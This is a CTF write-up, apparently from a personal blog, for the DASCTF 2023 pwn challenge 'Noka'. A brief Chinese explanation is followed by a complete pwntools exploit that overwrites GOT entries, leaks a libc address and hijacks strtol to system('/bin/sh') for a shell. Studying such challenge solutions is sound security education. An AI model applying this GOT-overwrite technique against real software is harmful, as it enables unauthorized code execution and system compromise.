Noka
DASCTF_2023_6_二进制专项 Noka
考完期末,开始复现
利用gift将malloc的got表改成read_num,以此控制add函数中赋值给tmp_ptr的指针,让指针指向malloc的got表项进行泄露libc,再修改strtol的got为system函数地址即可
想不明白为啥零解
EXP
from pwn import *
# --- pwntools session ------------------------------------------------------
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
context.log_level = 'debug'

# Local challenge binary and the libc build it is expected to run against.
ELFpath = '/home/wjc/Desktop/noka'
libcpath = '/home/wjc/glibc-all-in-one-master/libs/2.35-0ubuntu3.1_amd64/libc.so.6'

p = process(ELFpath)
#p=remote('118.24.118.158',9999)
e = ELF(ELFpath)
libc = ELF(libcpath)


# --- thin wrappers over the tube `p` (same names the rest of the script uses)
def rut(marker):
    """recvuntil `marker`, giving up after 0.1 s."""
    return p.recvuntil(marker, timeout=0.1)


def ru(marker):
    """recvuntil `marker` with no timeout."""
    return p.recvuntil(marker)


def r(count):
    """Receive up to `count` bytes."""
    return p.recv(count)


def sl(data):
    """sendline `data` unchanged."""
    return p.sendline(data)


def sls(value):
    """sendline str(value)."""
    return p.sendline(str(value))


def ss(value):
    """send str(value) with no newline."""
    return p.send(str(value))


def s(data):
    """send `data` unchanged, no newline."""
    return p.send(data)


def uu64(data):
    """Unpack a pointer shorter than 8 bytes after NUL-padding it."""
    return u64(data.ljust(8, '\x00'))


def it():
    """Hand the tube over to the user."""
    return p.interactive()


def b():
    """Attach gdb with no script."""
    return gdb.attach(p)


def bp(bkp):
    """Attach gdb and set one breakpoint at `bkp`."""
    return gdb.attach(p, 'b *' + str(bkp))


def get_leaked_libc():
    """Read until a 0x7f byte and unpack the 6 bytes ending there as a
    little-endian pointer; the caller subtracts the matching libc symbol."""
    return u64(ru('\x7f')[-6:].ljust(8, '\x00'))


# name -> value pairs that LOGALL() prints at the end of the run
LOGTOOL = {}
def LOGALL():
    """Print every entry of LOGTOOL as `name:` padded to 20 columns plus hex value."""
    log.success("**** all result ****")
    for name, value in LOGTOOL.items():
        log.success("%-20s%s" % (name + ":", hex(value)))
def get_base(a, text_name):
    """Find the load addresses of the target binary and of libc.

    `a.libs()` is expected to map a library path to its base address (this is
    the pwntools tube method). A path containing `text_name` counts as the
    binary; any other path containing "libc" counts as libc. If several paths
    match, the last one seen wins; a missing mapping is reported as 0.

    Returns a (text_base, libc_base) tuple.
    """
    text_addr, libc_base = 0, 0
    for path, base in a.libs().items():
        if text_name in path:
            text_addr = base
            continue
        if "libc" in path:
            libc_base = base
    return text_addr, libc_base
def debug():
    """Attach gdb to `p`, exporting the binary and libc bases as gdb
    convenience variables and breaking at 0x401305.

    The breakpoint is an absolute address, so this presumes a non-PIE build
    (the rest of the script makes the same assumption).
    """
    global p
    text_base, libc_base = get_base(p, 'noka')
    # Same gdb script text as before: a leading newline, two `set` lines,
    # the breakpoint, trailing newline.
    script = "\nset $text_base = {}\nset $libc_base = {}\nb*0x401305\n".format(
        text_base, libc_base)
    gdb.attach(p, script)
def ptrxor(pos, ptr):
    """Return `ptr` XOR-mangled with (pos >> 12), packed as 8 little-endian
    bytes. This is the (pos >> 12) ^ ptr form glibc safe-linking applies to
    tcache/fastbin next pointers; it is defined here but unused by the script.
    """
    mangled = (pos >> 12) ^ ptr
    return p64(mangled)
def add(fake_addr, content):
    """Drive menu option 1.

    Answers the size prompt with 8, then sends `fake_addr` as a second number,
    then `content` at the text prompt. As the writeup explains, once malloc's
    GOT entry has been redirected to read_num that second number is what ends
    up in tmp_ptr, so `content` lands at `fake_addr`. The short sleep
    presumably lets the target consume the size line before the address
    arrives on the same input stream.
    """
    for prompt, reply in (('> ', '1'), ('size: ', "8")):
        ru(prompt)
        sl(reply)
    sleep(0.1)
    sl(str(fake_addr))
    ru('text: ')
    s(content)
def show():
    """Select menu option 2; the script then reads the leaked pointer from
    whatever the target prints for the entry tmp_ptr points at."""
    ru('> ')
    sl('2')
def gift(addr, value):
    """Drive menu option 3, answering the "Break Point" and "Break Value"
    prompts with `addr` and `value`. The script uses it exactly once, to point
    malloc's GOT entry at read_num."""
    ru('> ')
    sl('3')
    for prompt, answer in (('Break Point:', addr), ('Break Value:', value)):
        ru(prompt)
        sl(str(answer))
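# --- exploit sequence --------------------------------------------------------
# Everything below depends on two build properties: absolute addresses
# (0x4040b0, 0x401254) only hold for a non-PIE binary, and writing GOT entries
# only works when the GOT is not read-only (no Full RELRO). Both are inferred
# from the script, not shown on this page; check them with checksec before
# reusing any of this.
tmp_ptr = 0x4040b0          # address of the tmp_ptr variable (per the writeup)
read_num = 0x401254         # the binary's number-reading routine (per the writeup)
strtol_got = e.got['strtol']
malloc_got = e.got['malloc']
read_got = e.got['read']

# 1. malloc -> read_num, so the next add() lets us choose what tmp_ptr holds.
gift(malloc_got, read_num)
# 2. Point tmp_ptr at read's GOT slot and show() it to leak a libc address.
add(tmp_ptr, p64(read_got))
show()
libcbase = get_leaked_libc() - libc.symbols['read']
LOGTOOL['libcbase'] = libcbase
system_addr = libcbase + libc.symbols['system']
LOGTOOL['system'] = system_addr
# next() instead of the Python-2-only .next() so the script also runs on
# Python 3 pwntools; the value is only logged, never used below.
str_bin_sh = libcbase + next(libc.search('/bin/sh'))
LOGTOOL['str_bin_sh'] = str_bin_sh
#debug()
LOGALL()
# 3. strtol -> system; the next menu line is presumably fed to strtol, so the
#    string sent here becomes system()'s argument.
add(strtol_got, p64(system_addr))
sl('/bin/sh\x00')
it()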
